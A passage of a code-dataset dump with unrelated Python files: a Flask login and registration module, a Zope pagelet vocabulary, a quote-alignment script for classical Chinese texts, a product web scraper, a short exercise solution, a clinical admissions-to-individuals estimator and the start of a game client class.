current_user():\n username = session.get('username', '')\n u = User.query.filter_by(username=username).first()\n return u\n\n\n@main.route('/login')\ndef login_view():\n return render_template('login.html')\n\n@main.route('/login', methods=['POST'])\ndef login():\n form = request.get_json()\n username = form.get('username', '') \n user = User.user_by_name(username)\n\n r = {\n 'success': False,\n 'message': '登录失败',\n }\n\n #验证用户名和密码\n if user is not None and user.validate_auth(form):\n r['success'] = True\n r['next'] = request.args.get('next',url_for('controller.index_view'))\n session.permanent = True\n session['username'] = username\n return jsonify(r)\n\n@main.route('/register', methods=['POST'])\ndef register():\n form = request.get_json()\n u = User(form)\n r = {\n 'success': True,\n }\n status,msgs = u.register_validate()\n if status:\n u.save()\n r['success'] = True\n r['next'] = request.args.get('next', url_for('controller.index_view'))\n session.permanent = True\n session['username'] = u.username\n else:\n r['success'] = False\n r['message'] = '\\n'.join(msgs)\n return jsonify(r) \n\n@main.route('/logout')\ndef logout():\n session['username'] = None\n return render_template('index.html', user=None)\n\n","sub_path":"app/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"406952868","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"PageletChooser vocabulary\n\n$Id:$\n\"\"\"\n__docformat__ = 'restructuredtext'\n\nfrom zope.interface import directlyProvides\n\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\nfrom zope.app import zapi\n\nfrom zope.app.component.interface import queryInterface\n\nfrom zope.app.pagelet.interfaces import IPagelet\n\nfrom zope.app.pageletchooser.exceptions import \\\n PageletVocabularyInterfaceLookupError\nfrom zope.app.pageletchooser.exceptions import \\\n PageletError_vocabulary_interface_not_found\n\nfrom zope.app.pageletchooser.interfaces import IChooseablePagelets\n\n\n\nclass Wrapper:\n \"\"\"Dummy class for to provide a interface.\"\"\"\n\n\n\nclass PageletNamesVocabulary(SimpleVocabulary):\n \"\"\"A vocabular of optional pagelet macro names for a given interface.\n\n Imports:\n \n >>> import zope.component\n >>> from zope.interface import Interface\n >>> from zope.security.checker import defineChecker\n >>> from zope.publisher.interfaces.browser import IBrowserRequest\n >>> from zope.component.interfaces import IView\n >>> from zope.app.pagelet.interfaces import IPagelet\n >>> from zope.app.pagelet.interfaces import IPageletSlot\n >>> from zope.app.pagelet.tests import TestPagelet\n >>> from zope.app.pagelet.tests import TestContext\n >>> from zope.app.pagelet.tests import testChecker\n\n Setup:\n\n >>> from zope.app.tests import setup, ztapi\n >>> setup.placefulSetUp()\n\n Register interfaces used for pagelet and vocabulary:\n\n >>> from zope.app.component.interface import provideInterface\n >>> utilities = zapi.getGlobalService(zapi.servicenames.Utilities)\n >>> provideInterface('', IBrowserRequest, None)\n >>> provideInterface('', IView, None)\n >>> provideInterface('', IChooseablePagelets, None)\n\n Register pagelet:\n\n >>> name = 'testpagelet'\n >>> pagelet_factory = TestPagelet\n >>> defineChecker(pagelet_factory, testChecker)\n >>> adaptersrv = zope.component.getService('Adapters')\n >>> adaptersrv.register(\n ... (Interface, IBrowserRequest, IView, IPageletSlot)\n ... , IPagelet, name, pagelet_factory)\n\n Register vocabulary:\n \n >>> from zope.app.pagelet.tests import TestContext\n >>> name=\"chooseablepageletnames\"\n >>> factory=\".vocabulary.PageletNamesVocabulary\"\n >>> layer=\"zope.publisher.interfaces.browser.IBrowserRequest\"\n >>> view=\"zope.component.interfaces.IView\"\n >>> slot=\"zope.app.pageletchooser.interfaces.IChooseablePagelets\"\n >>> obj = TestContext()\n >>> vocab = PageletNamesVocabulary(obj, layer, view, slot)\n\n Test vocabulary:\n\n >>> \"testpagelet\" in vocab\n True\n\n >>> \"nothing\" in vocab\n False\n\n >>> setup.placefulTearDown()\n\n \"\"\"\n def __init__(self, context, layer, view, slot):\n macronames = []\n terms = []\n \n # get and check interface\n layeriface = queryInterface(layer)\n if layeriface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, layer)\n\n viewiface = queryInterface(view)\n if viewiface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, view)\n\n slotiface = queryInterface(slot)\n if slotiface is None:\n raise PageletVocabularyInterfaceLookupError(\n PageletError_vocabulary_interface_not_found, slot)\n\n # prepare objects for lookup the adapters \n layerwrapper = Wrapper()\n directlyProvides(layerwrapper, layeriface)\n \n viewwrapper = Wrapper()\n directlyProvides(viewwrapper, viewiface)\n \n slotwrapper = Wrapper()\n directlyProvides(slotwrapper, slotiface)\n \n # collect pagelets\n objects = context, layerwrapper, viewwrapper, slotwrapper\n pagelets = zapi.getAdapters(objects, IPagelet)\n pagelets.sort(lambda x, y: x[1].weight - y[1].weight)\n\n for name, pagelet in pagelets:\n macronames.append(name)\n\n for name in macronames:\n terms.append(SimpleTerm(name, name, name))\n\n terms.sort(lambda lhs, rhs: cmp(lhs.title, rhs.title))\n super(PageletNamesVocabulary, self).__init__(terms)\n","sub_path":"Zope3/tags/before-blow-services-merge/src/zope/app/pageletchooser/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270792999","text":"'''\r\nThis script takes the compiled results compiles and aligns quotes\r\nbetween documents that the scholar is interested in. If no documents\r\nare listed, this operates on the entire corpus, but can be very slow\r\ndepending on corpus size.\r\n'''\r\n\r\nimport pickle, os, time, sys\r\nimport numpy as np\r\nimport json\r\nimport re\r\n\r\nimport Levenshtein\r\nfrom multiprocessing import Pool\r\nfrom itertools import repeat, chain\r\n\r\n#********************#\r\n# DOCUMENTS TO ALIGN #\r\n#********************#\r\n\r\n# Align quotes occuring between the following documents. Provide at\r\n# least two. If None, all quotes will be aligned. If your corpus contains\r\n# signficant reuse, this may be slow.\r\nalignment_docs = None\r\n#[\"003 卷耳-前漢-毛\", \"003 卷耳-唐-孔穎達\", \"006 桃夭-唐-孔穎達\", \"007 兔罝-唐-孔穎達\", \"009 漢廣-唐-孔穎達\", \"011 麟之趾-前漢-毛\", \"011 麟之趾-唐-孔穎達\", \"011 麟之趾-後漢-鄭玄\", \"017 行露-唐-孔穎達\", \"017 行露-後漢-鄭玄\", \"020 摽有梅-唐-孔穎達\", \"024 何彼襛矣-前漢-毛\", \"024 何彼襛矣-唐-孔穎達\", \"025 騶虞-前漢-毛\", \"025 騶虞-唐-孔穎達\", \"031 擊鼓-前漢-毛\", \"031 擊鼓-唐-孔穎達\", \"031 擊鼓-後漢-鄭玄\", \"032 凱風-前漢-毛\", \"032 凱風-唐-孔穎達\", \"037 旄丘-前漢-毛\", \"037 旄丘-唐-孔穎達\", \"037 旄丘-後漢-鄭玄\", \"047 君子偕老-前漢-毛\", \"047 君子偕老-唐-孔穎達\", \"048 桑中-前漢-毛\", \"048 桑中-唐-孔穎達\", \"048 桑中-後漢-鄭玄\", \"050 定之方中-前漢-毛\", \"050 定之方中-唐-孔穎達\", \"050 定之方中-後漢-鄭玄\", \"065 黍離-唐-孔穎達\", \"065 黍離-後漢-鄭玄\"]\r\n\r\n\r\n#**********************#\r\n# ALIGNMENT PARAMETERS #\r\n#**********************#\r\n\r\n# Match, mismatch, and gap scores\r\nMATCHSCORE = 1\r\nMISALIGNSCORE = -1\r\nMISMATCHSCORE = -1\r\n\r\n# Limit the length of text that will be aligned\r\n# This significantly speeds up the algorithm when\r\n# aligning very long quotes. This divides the quotes\r\n# into blocks of CHUNKLIM length. It tries to divide\r\n# the chunks in places where the alignment is exact\r\n# So OVERLAP looks at the 10 character before and after\r\n# the proposed break. When it finds RANGEMATCH exact\r\n# characters, it inserts a break in the middle.\r\nCHUNKLIM = 200\r\nOVERLAP = 10\r\nRANGEMATCH = 6\r\n\r\n\r\n#************************#\r\n# Input and output files #\r\n#************************#\r\n# Input\r\nCORPUSRESULTS = \"corpus_results.txt\"\r\n# Output\r\nOUTPUTFILE = \"corpus_alignment.txt\"\r\n\r\n\r\n\r\n#****************#\r\n# GLOBAL TRACKER #\r\n#****************#\r\n# to track alignment progress\r\ntracker = 0\r\n\r\n#**********************#\r\n# FUNCTION DEFINITIONS #\r\n#**********************#\r\n\r\n# Divide texts into smaller chunks of a certain maximum length\r\n# To optimze for later alignment, divide texts in areas of high\r\n# homology\r\ndef divtexts(quote1, quote2, chunklimit,overlap,rangecheck):\r\n chunks = len(quote1)//chunklimit\r\n qs1 = 0\r\n qs2 = 0\r\n chunkedTexts = []\r\n for chunk in range(chunks + 1):\r\n if chunk != chunks:\r\n tqe1 = (chunk+1)*chunklimit\r\n tqe2 = (chunk+1)*chunklimit\r\n\r\n # retreive the boundary region\r\n tqr1 = quote1[tqe1-rangecheck:tqe1+rangecheck]\r\n tqr2 = quote2[tqe2-rangecheck:tqe2+rangecheck]\r\n\r\n # identify a stretch of identical overlap and save the midpoint\r\n qe1 = None\r\n qe2 = None\r\n for i in range(len(tqr1)-overlap):\r\n for j in range(len(tqr2)-overlap):\r\n if tqr1[i:i+overlap] == tqr2[j:j+overlap]:\r\n qe1 = tqe1 - rangecheck + i + overlap//2\r\n qe2 = tqe2 - rangecheck + i + overlap//2\r\n # If no region is identified, just cut at initial boundary\r\n if not qe1:\r\n qe1 = tqe1\r\n qe2 = tqe2\r\n\r\n # save the cut region\r\n chunkedTexts.append([quote1[qs1:qe1],quote2[qs2:qe2]])\r\n\r\n # move the start of the next chunk to the end of the last one\r\n qs1 = qe1\r\n qs2 = qe2\r\n else:\r\n if len(quote1[qs1:]) == 0 or len(quote2[qs2:]) == 0:\r\n chunkedTexts[-1][0] += quote1[qs1:]\r\n chunkedTexts[-1][1] += quote2[qs2:]\r\n else:\r\n chunkedTexts.append([quote1[qs1:],quote2[qs2:]])\r\n return chunkedTexts\r\n\r\n# Algorithm used for quote alignment. Insights into how this work come from the original\r\n# Needleman-Wunsch article, but also from http://www.biorecipes.com/DynProgBasic/code.html\r\ndef align(quote1, quote2,matchscore=MATCHSCORE,misalignscore=MISALIGNSCORE,mismatchscore=MISMATCHSCORE, chunklim=CHUNKLIM):\r\n\r\n # The alignment algorithm is O(n^2) so only alinging short chunks speeds\r\n # the process up. Here I divide each sequence into smaller chunks for\r\n # alignment and then recombine them at the end.\r\n if len(quote1) > chunklim:\r\n textchunks = divtexts(quote1, quote2, CHUNKLIM, OVERLAP, RANGEMATCH)\r\n else:\r\n textchunks = [[quote1, quote2]]\r\n\r\n # Empty strings to store the calculated quotes\r\n total_quote_1 = \"\"\r\n total_quote_2 = \"\"\r\n\r\n # Iterate through each of the divided texts\r\n for texts in textchunks:\r\n\r\n # Create alignment matrix\r\n matrix = np.zeros([len(texts[0])+1,len(texts[1])+1])\r\n # prep matrix:\r\n for i in range(len(texts[0])+1):\r\n matrix[i][0] = -i\r\n for j in range(len(texts[1])+1):\r\n matrix[0][j] = -j\r\n\r\n\r\n # Iterate through both texts and fill out the matrix\r\n for i in range(len(texts[0])):\r\n for j in range(len(texts[1])):\r\n # Get characters to compare\r\n c1 = texts[0][i]\r\n c2 = texts[1][j]\r\n\r\n # If they are the same, give them the matching score.\r\n # Otherwise, give them the mismatch score\r\n if c1 == c2:\r\n score = matchscore\r\n else:\r\n score = mismatchscore\r\n\r\n # get the pertinent matrix location (which will be both plus one)\r\n matrixrow = i+1\r\n matrixcolumn = j+1\r\n\r\n # Calculate scores from top, left, and diagnol\r\n upperscore = matrix[i][j+1] + misalignscore\r\n leftscore = matrix[i+1][j] + misalignscore\r\n diagonal = matrix[i][j] + score\r\n\r\n # Select the highest score and place it in the box\r\n currentscore = max([upperscore, leftscore, diagonal])\r\n matrix[matrixrow][matrixcolumn] = currentscore\r\n\r\n # Create two empty strings for the traceback\r\n stringa = \"\"\r\n stringb = \"\"\r\n\r\n # Traceback to get the best alignment\r\n # Begin at the bottom right corner\r\n i = len(matrix)-1\r\n j = len(matrix[0])-1\r\n\r\n # Get the final score\r\n finalscore = matrix[i][j]\r\n\r\n # While i or j is above zero, trace backwards\r\n while i > 0 or j > 0:\r\n # Get the maximum value from the adjacent squares\r\n upper = matrix[i][j - 1]\r\n left = matrix[i-1][j]\r\n diagonal = matrix[i-1][j-1]\r\n maxval = max([upper, left, diagonal])\r\n\r\n # If the maximum value is the diagonal, move diagonally\r\n if maxval == diagonal:\r\n i -= 1\r\n j -= 1\r\n stringa = texts[0][i] + stringa\r\n try:\r\n stringb = texts[1][j] + stringb\r\n except:\r\n print(texts, i, j)\r\n # If the maximum value is above, insert gap into stringa\r\n elif maxval == upper:\r\n j -= 1\r\n stringa = \" \"+stringa\r\n stringb = texts[1][j] + stringb\r\n # If the maximum value is left, insert gap into stringb\r\n elif maxval == left:\r\n i -= 1\r\n stringa = texts[0][i] + stringa\r\n stringb = \" \"+stringb\r\n\r\n # add all parts of the string together\r\n total_quote_1 += stringa\r\n total_quote_2 += stringb\r\n\r\n # Trim the bits left over from searching algorithm. In certain edge cases\r\n # the ends are not the same\r\n # IW: Commented, uncomment the following lines to trim\r\n # while total_quote_1[-1] == \" \" or total_quote_2[-1] == \" \":\r\n # total_quote_1 = total_quote_1[:-1]\r\n # total_quote_2 = total_quote_2[:-1]\r\n # while total_quote_1[-1] != total_quote_2[-1]:\r\n # total_quote_1 = total_quote_1[:-1]\r\n # total_quote_2 = total_quote_2[:-1]\r\n\r\n return total_quote_1, total_quote_2\r\n\r\n# IW: Retrieve text from the original corpus\r\ndef original(data,orig):\r\n data[6] = get_original(data, orig, 0, 4, 6)\r\n data[7] = get_original(data, orig, 1, 5, 7)\r\n return data\r\n\r\n# IW: Get the original segment with the newly added spaces\r\ndef get_original(data, metadata, a, b, c):\r\n start = int(data[b])\r\n end = int(data[b]) + len(data[c])\r\n res = metadata[data[a]][start:end]\r\n\r\n if ' ' in data[c]:\r\n spaces = [m.start() for m in re.finditer(' ', data[c])]\r\n for pos in spaces:\r\n res = insert_space(res,pos)\r\n return res[:len(data[c])]\r\n\r\n# IW: Insert spaces to match aligned text\r\ndef insert_space(text, pos):\r\n return text[:pos]+' '+text[pos:]\r\n\r\n# Run the process\r\ndef runalignment(content,totallength,orig=False):\r\n global tracker\r\n info = content.split(\"\\t\")\r\n # If the quotes are identical, no need to align them\r\n if float(info[3]) != 1.0:\r\n # Run the alignment algorithm\r\n aligneda, alignedb = align(info[6], info[7])\r\n\r\n # Save the information\r\n info[6] = aligneda\r\n info[7] = alignedb\r\n\r\n # IW: Retrieve text from original corpus\r\n # useful if variants were replaced in prepare_corpus\r\n if orig is not False:\r\n info = original(info,orig)\r\n\r\n content = \"\\t\".join(info)\r\n tracker += 1\r\n if tracker % 1000 == 0:\r\n sys.stdout.write(f\"{tracker} out of {totallength} aligned \\r\")\r\n sys.stdout.flush()\r\n return content\r\n\r\n#*********************#\r\n# START OF MAIN LOGIC #\r\n#*********************#\r\n\r\nif __name__=='__main__':\r\n # Start a global timer\r\n gs = time.time()\r\n\r\n # Initialize thread pool for parallel processing\r\n pool = Pool()\r\n runtimes = []\r\n save_contents = []\r\n\r\n # Results container\r\n results = []\r\n # Iterate through each line in the file aligning the results using map\r\n with open(CORPUSRESULTS, \"r\") as rf:\r\n contents = rf.read().split(\"\\n\")\r\n contents = contents[1:]\r\n\r\n # If alignment_docs have been provided, extract the relevant quotes\r\n if alignment_docs:\r\n use_contents = []\r\n pairs = set()\r\n for t1 in alignment_docs:\r\n for t2 in alignment_docs:\r\n if t1 != t2:\r\n pairs.add((t1, t2))\r\n\r\n for line in contents:\r\n info = line.split(\"\\t\")\r\n pair = (info[0], info[1])\r\n if pair in pairs:\r\n use_contents.append(line)\r\n contents = use_contents\r\n\r\n # IW: Open json where the original text has been stored\r\n # only if prepare_corpus.py was used with -v option\r\n try:\r\n with open('./corpus.json','r') as of:\r\n orig = json.load(of)\r\n results = pool.starmap(runalignment,zip(contents,repeat(len(contents)),repeat(orig)))\r\n except FileNotFoundError:\r\n print('There is no variants in your corpus or you chose not to take them into account')\r\n results = pool.starmap(runalignment,zip(contents,repeat(len(contents))))\r\n\r\n\r\n # Remove blank results and flatten the list\r\n save_contents = [s for s in results if len(s) > 0]\r\n\r\n with open(OUTPUTFILE, \"w\") as wf:\r\n wf.write(\"\\n\".join(save_contents))\r\n\r\n ge = time.time()\r\n gt = ge-gs\r\n print(f\"Global Operation completed in {gt:.2f} seconds\")\r\n","sub_path":"align_quotes.py","file_name":"align_quotes.py","file_ext":"py","file_size_in_byte":12067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"524962533","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n\nresponse = requests.get('https://chaldal.com/powder-mixes') #put the url of webpage\n\nsoup = BeautifulSoup(response.text, 'html.parser')\n\nwith open('chalDal_Beverage_syrupPowderdrinks','w') as csv_file: # csv file name\n\tcsv_writer = writer(csv_file)\n\theaders = ['ImageUrl', 'Name','Quantity','Price'] #headers of csv file\n\tcsv_writer.writerow(headers)\n\n\tproducts = soup.find_all(class_='product')\n\n\tfor product in products:\n\t\timage = product.find('img')['src'] # get image source\n\t\tname = product.find(class_='name').get_text() #get name from class = name\n\t\tquantity = product.find(class_='subText').get_text()\n\t\tprice = product.find(class_='price').get_text()\n\t\t# print(image,name,quantity,price)\n\t\tcsv_writer.writerow([image,name,quantity,price]) #write row wise data in csv file\n\n\n","sub_path":"websrape.py","file_name":"websrape.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"298555950","text":"'''For This,Had to check the condition for a perfect square and include that\ncondition too.Once Done,worked Like a Charm.'''\n\nimport math\n\n\ndef is_smart_number(num):\n val = int(math.sqrt(num))\n if val**2 == num or num / val == 1:\n return True\n return False\n\n\nfor _ in range(int(input())):\n num = int(input())\n ans = is_smart_number(num)\n if ans:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Debugging/Is Smart Number.py","file_name":"Is Smart Number.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"331922216","text":"\"\"\"\nEstimate individuals in the non-Marketscan correction factor inputs\n\nas of 3/21/2019 we have 3 non-MS sources that the clinical team preps\nPHL, USA HCUP SID and NZL NMDS.\n\nThis is a helper script that each CF input script will call to get\nfrom admissions to individual cases. Since this is based on the marketscan\nclaims process we'll import some modules from there\n\"\"\"\n\nimport itertools\nimport time\nimport pandas as pd\n\nfrom clinical_info.Functions import hosp_prep\nfrom clinical_info.Mapping import clinical_mapping\nfrom clinical_info.Claims.query_ms_db import marketscan_estimate_indv as mei\n\ndef clean_bad_ids(df):\n \"\"\"\n If a patient ID includes multiple ages or sexes we don't want to use it\n \"\"\"\n print(\"df shape with missing pat IDs is {}\".format(df.shape))\n # drop missing patient IDs\n df = df[df.patient_id != \".\"]\n df = df[df.age.notnull()]\n if df.shape[0] == 0:\n print(\"This source is missing unique patient ids\")\n # return a blank dataframe b/c we can't use this source\n # these are currently only certain HCUP states\n # but will check it to make sure all jobs finished\n return pd.DataFrame()\n\n print(\"df shape is\", df.shape)\n # drop duplicates by ID and sex\n x = df[['patient_id', 'sex_id']].drop_duplicates()\n # keep only IDs that are duplicated i.e. that have multiple sex IDs for them\n x = x[x.duplicated(subset=['patient_id'])]\n # drop enrollee IDs with 2 sexes associated\n df = df[~df.patient_id.isin(x.patient_id)]\n print(\"there were {} bad patient IDs due to multiple sexes\".format(x.shape[0]))\n\n dfG = df.copy()\n dfG['age_min'] = dfG['age']\n dfG['age_max'] = dfG['age']\n # create age min and max by enrollee ID groups\n dfG = dfG.groupby(['patient_id']).agg({'age_min': 'min', 'age_max': 'max'}).reset_index()\n min_age_df = dfG[['patient_id', 'age_min']].copy()\n # find the difference beween min and max\n dfG['age_diff'] = dfG['age_max'] - dfG['age_min']\n # drop where difference is greater than 1 year\n dfG = dfG[dfG.age_diff > 1]\n print(\"there were {} bad patient IDs due to large age differences\".format(dfG.shape[0]))\n\n df = df[~df.patient_id.isin(dfG.patient_id)]\n del x\n\n # the difference in patient ages is causing problems with the counts\n # ie someone is 49 on their first visit and 50 on the second, but they're\n # admitted twice in a year for the same bundle id\n # so take only the patient's youngest age on record\n df = df.merge(min_age_df, how='left', on='patient_id')\n df['age_diff'] = df['age'] - df['age_min']\n print(\"age diffs are\", df['age_diff'].value_counts(dropna=False))\n assert df['age_diff'].max() <= 1\n df.drop(['age', 'age_diff'], axis=1, inplace=True)\n df.rename(columns={'age_min': 'age'}, inplace=True)\n del dfG\n\n # remove null ages and sexes values\n df = df[df['age'].notnull() & df['sex_id'].notnull()]\n\n # remove sexes that need to be age split\n df = df[df.sex_id != 9]\n\n print(df.patient_id.unique().size)\n return df\n\ndef expandgrid(*itrs):\n # create a template df with every possible combination of\n # age/sex/year/location to merge results onto\n # define a function to expand a template with the cartesian product\n product = list(itertools.product(*itrs))\n return({'Var{}'.format(i+1):[x[i] for x in product] for i in range(len(itrs))})\n\ndef loop_over_agg_types(df, cause_type, map_version, prod=True):\n # now loop over every possible way to sum up cases\n agg_types = ['inp_pri', 'inp_any']\n\n # counter to determine to merge or append\n loop_counter = 1\n\n for agg_type in agg_types:\n print(\"beginning {} individual calculations\".format(agg_type))\n # drop DX depending on inp/otp/primary/any\n if agg_type == 'inp_pri':\n # drop all non inpatient primary data\n dat_indv = df[(df.diagnosis_id == 1)].copy()\n dat_claims = df[(df.diagnosis_id == 1)].copy()\n if agg_type == 'inp_any':\n # source is inp only so keep everything\n dat_indv = df.copy()\n dat_claims = df.copy()\n\n # if the subset dataframe is empty move on to next set\n if dat_indv.shape[0] == 0:\n continue\n\n # we also want to go from claims data to estimates for individuals\n prev = dat_indv[dat_indv['{}_measure'.format(cause_type)] == 'prev'].copy()\n # drop all the duplicates for prev causes, equivalent to a 365 day duration\n prev.drop_duplicates(subset=['patient_id', cause_type + '_id'], inplace=True)\n\n inc = dat_indv[dat_indv['{}_measure'.format(cause_type)] == 'inc'].copy()\n\n # create incidence estimates\n final_inc = []\n if inc.shape[0] > 0:\n inc = clinical_mapping.apply_durations(inc, map_version=map_version, cause_type=cause_type, prod=prod, fill_missing=False)\n\n # compare pd concat to appending a list\n start = time.time()\n\n ##### ATTEMPTS TO SPEED THINGS UP#######\n # drop all combinations of patient ID and nfc that occur on same day\n inc.drop_duplicates(subset=['patient_id', 'adm_date',\n cause_type + '_id'], inplace=True)\n\n # if an enrollee ID is only present once in this dataframe then thats\n # it, theres just one individual. No need to pass these rows to our\n # recursive function\n r = inc.groupby('patient_id').size().reset_index()\n l = inc.groupby('patient_id')[cause_type + '_id'].nunique().reset_index()\n m = l.merge(r, how='outer', on='patient_id')\n id_array = m.loc[m[cause_type + '_id'] == m[0], 'patient_id']\n inc_indv = inc[inc.patient_id.isin(id_array)].copy()\n \n del r, l, m\n\n final_inc.append(inc_indv)\n # remove these IDs from the object that goes to recursive dur\n inc = inc[~inc.patient_id.isin(id_array)].copy()\n assert (inc.patient_id.value_counts() > 1).all(),\\\n \"There are enrollee IDs with fewer than 2 value counts\"\n\n inc.sort_values(by=['patient_id', cause_type + '_id', 'adm_date'], inplace=True)\n\n inc = inc.groupby(['patient_id', cause_type + '_id'])\n \n counter = 0\n for patient_id, cause_df in inc:\n counter += 1\n if counter % 15000 == 0:\n print(\"{} Still going...\".format(round((time.time() - start)/60, 2)))\n final_inc.append(mei.recursive_duration(cause_df, pd.DataFrame(), 0, 0))\n print(\"{} done in {} min\".format(agg_type, (time.time()-start)/60))\n\n # bring the data back together\n if len(final_inc) > 0:\n inc_df = pd.concat(final_inc)\n dat_indv = pd.concat([inc_df, prev], sort=False)\n # actually I think these are just called icg durations b/c they're defined at the icg level and then expanded\n # somewhat artificially to bundle\n drop_cols = [col for col in ['adm_limit', '{}_duration'.format(cause_type)] if col in dat_indv.columns]\n dat_indv.drop(labels=drop_cols, axis=1, inplace=True)\n else:\n dat_indv = prev.copy()\n\n # null rows are lost in the groupby so these max cols are used\n # to make sure we're not losing any extra data beyond these nulls\n indv_loss = dat_indv.isnull().sum().max()\n claims_loss = dat_claims.isnull().sum().max()\n print(\"the most null claims from any columns {}\".format(claims_loss))\n indv_sum = dat_indv.shape[0] - indv_loss\n claims_sum = dat_claims.shape[0] - claims_loss\n\n # now create cases\n col_name_a = agg_type + \"_claims_cases\"\n dat_claims[col_name_a] = 1\n\n col_name_i = agg_type + \"_indv_cases\"\n dat_indv[col_name_i] = 1\n\n print(\"Review the null values, ideally there would be zero in all columns\",\n dat_claims.isnull().sum())\n print(\"Review the null values, ideally there would be zero in all columns\",\n dat_indv.isnull().sum())\n # groupby and collapse summing cases\n groups = ['location_id', 'year_start', 'year_end',\n 'age', 'sex_id', cause_type + '_id']\n # add these assertions because pandas groupby is very aggressive with\n # dropping NAs. set a 20% data loss threshold\n if dat_indv.shape[0] > 2000:\n assert (dat_indv[groups].isnull().sum() < dat_indv.shape[0] * .2).all()\n assert (dat_claims[groups].isnull().sum() < dat_claims.shape[0] * .2).all()\n\n # perform the groupby\n dat_claims = dat_claims.groupby(groups).agg({col_name_a: 'sum'}).reset_index()\n dat_indv = dat_indv.groupby(groups).agg({col_name_i: 'sum'}).reset_index()\n\n if loop_counter == 1:\n print(\"Creating template df from the dat_claims object\")\n template_df = dat_claims\n loop_counter += 1 # set to 2, won't overwrite on next loop\n else:\n print(\"Merging dat claims object onto template df b/c it already exists\")\n # merge onto our template df created above\n template_df = template_df.merge(dat_claims, how='outer', on = ['age', 'sex_id',\n 'location_id', 'year_start',\n 'year_end', cause_type + '_id'])\n\n template_df = template_df.merge(dat_indv, how='outer', on = ['age', 'sex_id',\n 'location_id', 'year_start',\n 'year_end', cause_type + '_id'])\n\n # check sum of cases to ensure we're not losing beyond what's expected\n assert template_df[col_name_a].sum() == claims_sum,\\\n \"Some cases lost. claims sum is {} type is {} data col sum is {}\".\\\n format(claims_sum, col_name_a, template_df[col_name_a].sum())\n assert template_df[col_name_i].sum() == indv_sum,\\\n \"Some cases lost. individual sum {} {} sum {}\".\\\n format(indv_sum, col_name_i, template_df[col_name_i].sum())\n\n # remove rows where every value is NA\n case_cols = template_df.columns[template_df.columns.str.endswith(\"_cases\")]\n col_sums = template_df[case_cols].sum()\n template_df.dropna(axis=0, how='all', subset=case_cols,\n inplace=True)\n assert (col_sums == template_df[case_cols].sum()).all()\n\n return template_df\n\ndef main(df, map_version='current', cause_type='icg'):\n \"\"\"\n run all the functions defined in this script to go from inpatient admissions\n to inpatient individuals\n \"\"\"\n df = clean_bad_ids(df)\n\n if df.shape[0] == 0:\n pass\n else:\n df = clinical_mapping.map_to_gbd_cause(df, input_type='cause_code',\n output_type=cause_type,\n write_unmapped=False,\n truncate_cause_codes=True,\n extract_pri_dx=True,\n prod=True, map_version=map_version,\n groupby_output=False)\n\n df = loop_over_agg_types(df, map_version=map_version, cause_type=cause_type)\n\n return df\n","sub_path":"gbd_2019/nonfatal_code/clinical_team/Corrections/correction_inputs/estimate_indv.py","file_name":"estimate_indv.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"251273986","text":"# -*- coding:utf8 -*-\nimport urllib.request\nfrom socket import *\nfrom frame_mgr import *\nimport threading\nimport mainwindow\nimport proto.message\nimport proto.myprint\nimport proto.player_info\nimport proto.top_info\nimport proto.player_ball_info\nimport proto.ball_info\nimport proto.player_animal_info\nimport proto.player_pb2\nimport proto.wilds_pb2\nimport math\nimport time\nimport random\nimport matchtime\nimport copy\nimport gamesync.follow\nimport gamesync.follow_ori\nimport gamesync.follow_physics\nimport gamesync.mope\nimport wx\nimport socket_mgr\nimport res\nimport gateway\nimport log\n\nprint=log.log\n\nBUFSIZ = 128 * 1024\n\n\nclass User():\n def __init__(self, sockindex, args, cfg):\n self.sockindex = sockindex\n self.args = args\n self.cfg = cfg\n self.addr = self.cfg[\"addr\"]\n self.port = self.cfg[\"port\"]\n self.ver = self.cfg[\"ver\"]\n \n # self.scene_id = 0\n self.scene_id = self.cfg[\"room\"][\"scene\"]\n self.room_type = 0\n self.usedelay = self.cfg[\"room\"][\"usedelay\"]\n self.delaymin = self.cfg[\"room\"][\"delaymin\"]\n self.delaymax = self.cfg[\"room\"][\"delaymax\"]\n self.kcp_enable = self.cfg[\"room\"][\"kcp_enable\"]\n self.udp_enable = self.cfg[\"room\"][\"udp_enable\"]\n self.mouseMove = self.cfg[\"room\"][\"mouse_move\"]\n self.cookie = \"\"\n self.account_name = \"\"\n self.id = 0\n self.ball_id = 0\n \n self.face = 0\n self.old_face = 0\n self.old_power = 0\n self.old_way = 0\n \n self.framemgr = FrameMgr()\n \n self.room_server_addr = \"\"\n self.room_server_key = \"\"\n self.client = None\n self.client_thread = None\n self.terminate = False\n self.player_name = \"\"\n self.players = {} # need lock\n self.playerballs = {} # need lock\n self.balls = {} # need lock\n self.balls_bg = {} # need lock\n self.top = None # need lock\n self.no_find_ball = {} # need lock\n self.mutex = threading.Lock()\n self.room_end_time = 0\n self.res = None\n\n self.udpclient = None\n 